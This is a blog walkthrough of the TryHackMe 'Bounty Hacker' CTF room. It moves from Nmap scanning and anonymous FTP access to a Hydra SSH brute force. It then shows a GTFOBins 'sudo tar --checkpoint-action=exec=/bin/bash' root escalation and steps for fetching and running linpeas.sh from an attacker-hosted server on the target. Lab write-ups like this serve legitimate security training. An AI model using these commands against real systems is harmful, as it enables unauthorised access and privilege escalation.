TryHackMe: Bounty Hacker Walkthrough

You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they’d take you up on your claims!

Introduction

If you want to practice pen-testing or level up your skills, I recommend TryHackMe. You can view TCM’s YouTube Video - **Start Your Cybersecurity Career with TryHackMe, for a quick overview of** the platform's benefits.

While no penetration test is the same, the process tends to follow a fairly stable methodology: Information Gathering (Reconnaissance), Enumeration/Scanning, Exploitation, Privilege Escalation, and Post-Exploitation (further enumeration, exploitation, maintaining access, covering tracks, reporting and clean-up).

This walkthrough follows the penetration testing methodology stages but mainly focuses on stages two, three, and four — scanning/enumeration, exploitation, and privilege escalation. Unfortunately, most CTFs don’t allow you to practice all five stages, especially stages one, four and five — Reconnaissance, Maintaining Access, and Covering Tracks

Required tools:

Penetration Testing OS - Kali or Parrot OS (or whichever security-focused OS you prefer)
GTFOBins: https://gtfobins.github.io/
LinPEAS.sh: https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS (not required, but bonus content)

If you are an anime fan, you have probably encountered Cowboy Bebop at some point. If not, you should check out this classic: the original Japanese anime, not Netflix’s version.

You can access the Cowboy Bebop theme box from TryHackMe’s platform: https[:]//tryhackme.com/r/room/cowboyhacker

The box is rated as easy, and I agree with the classification.

In my case, the target IP address was: 10.10.156.125

Stage One: Enumeration

I usually start my CTF enumerations with a Nmap scan optimised for speed instead of accuracy. I aim to quickly identify as many open ports as possible on the target to allow me to multitask on any further enumeration.

On this ‘bounty hack’, I found three open ports - 21 (FTP), 22 (SSH), and 80 (HTTP).

After identifying open ports, I launched a more detailed Nmap scan to identify potential vulnerabilities. These scans can take a while to complete, so I reviewed (enumerated) the obvious ports: HTTP.

Navigating to the web address, HTTP[:]//10.10.156.125 displays the page below; not much information is given away on the home page or the source code (but it ties nicely into the box theme).

This page is served up by the HTTP web server running on port 80.

HTML source code - nothing of interest here.

Usually, when I encounter a web server on a CTF, I enumerate the web directories using tools such as DirBuster, GoBuster, or FFUF.

However, Nmap completed the detailed scan, and the most interesting bit was the permitted anonymous login on the FTP port:

ftp-anon: Anonymous FTP login allowed (FTP code 230)

This vulnerability seems less likely to be a ‘rabbit hole’ and, therefore, worth exploring. A quick FTP login using the anonymous credentials gives us access to two files: task.txt and locks.txt.

Anonymous FTP access reveals two files of interest

Contents of the task.txt file

The task.txt file answers the CTF question ‘Who wrote the task list?‘.

In true CTF fashion, the locks.txt file appears to be a wordlist. Could it be that we have a username and possible password list to brute force SSH?

Contents of the locks.txt file

Stage Two: Exploitation

It's time to fire up Hydra and brute-force the SSH using the details we have so far; we know a possible user named Lin and a list of potential passwords from the FTP server.

As brute forcing SSH goes, this was pretty quick, and we got our working credentials to log into the target via SSH. Finding a set of working credentials for this CTF provides three solutions:

An answer to the question ‘What is the user’s password?‘,
Low-level access to the target and
The user flag (user.txt) from Lin’s desktop.

SSH login with the credentials found and retrieval of the user’s flag…

Stage Three: Privilege Escalation

Now that we have low-level access to the target, we need to figure out how to elevate privileges to get the root flag.

Manual Enumeration

I usually start manually enumerating the obvious vulnerabilities - bash history and sudo privileges. In this particular case, I was quite lucky in only having to check for two items before finding a ‘quick win’: (root) /bin/tar

Privilege elevation vulnerability

I found an easy way to elevate privileges on GTFOBins, modified the command slightly to get a bash shell, got root and retrieved the root flag(root.txt).

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

Achieved privilege elevation and retrieved root flag

Automated Enumeration (Bonus)

This section is more of a bonus for reference and learning than anything else. If you want to add something to your ethical hacker toolbox, read on, matey.

Manual enumeration can be tedious and time-consuming; if this is the path you tend to follow, I would advise creating a checklist or cheat sheet for post-exploit enumeration.

However, in real-world penetration tests, we are bound to a specific time frame for the assessment. During this time, we are tasked with identifying as many potential vulnerabilities within a system to help clients implement adequate mitigation and response measures.

In such situations, automated tools and scripts can improve our efficiency and accuracy in identifying vulnerabilities. If our target allows it, a useful Linux script we can use to identify as many vulnerabilities is LinPEAS.sh: https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS.

While I did not use LinPEAS to identify a vulnerability for this particular CTF, the steps are as follows:

Choose a ‘host’ directory on your attacker OS and navigate to it on your terminal. I usually store each CTF in a separate folder, e.g. bounty_hacker.
Download the LinPEAS shell script to this folder using the following command (This approach assumes your target cannot access the internet. If it can, then execute this command directly on the target and skip to step 6): curl -L <https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh>
Next, launch a temporary Python web server within this directory: python -m SimpleHTTPServer 8081

4. Note down your TryHackMe OpenVPN IP address. You can usually find it with: ip a s tun0

5. On your target machine, navigate to a directory where you have ‘write’ permission and execute this command to download the linpeas.sh file from your attacker OS: wget http://<your_attacker_ip>:8081/linpeas.sh

6. Once the download is complete, make sure to modify the ‘execute’ permission of the script file downloaded: chmod +x linpeas.sh

7. Lastly, execute the script to initiate searching for Linux privilege escalation vulnerabilities: ./linpeas.sh

This post will not analyse LinPEAS's output this time, but I highly recommend watching YouTube videos on interpreting the LinPEAS output and the pros and cons of using this script.

Conclusion

CTF challenges are an excellent way to explore, acquire, and maintain your penetration testing skills. However, as mentioned earlier, they only focus on stages two through four of the penetration testing methodology.

During real-world security assessments, we must provide clients with the best value for money. This means completing all five methodology stages, identifying as many vulnerabilities as possible, and recommending mitigation measures. One way of doing this is using automated tools and scripts.

This should still apply to CTFs as well, spending time evaluating all the possible ways of gaining initial access and elevating privileges within the system. Aspirations for my next CTF.

I hope you enjoyed this walkthrough of the TryHackMe Bounty Hacker box and またな (see you later).

Google Sites

Report abuse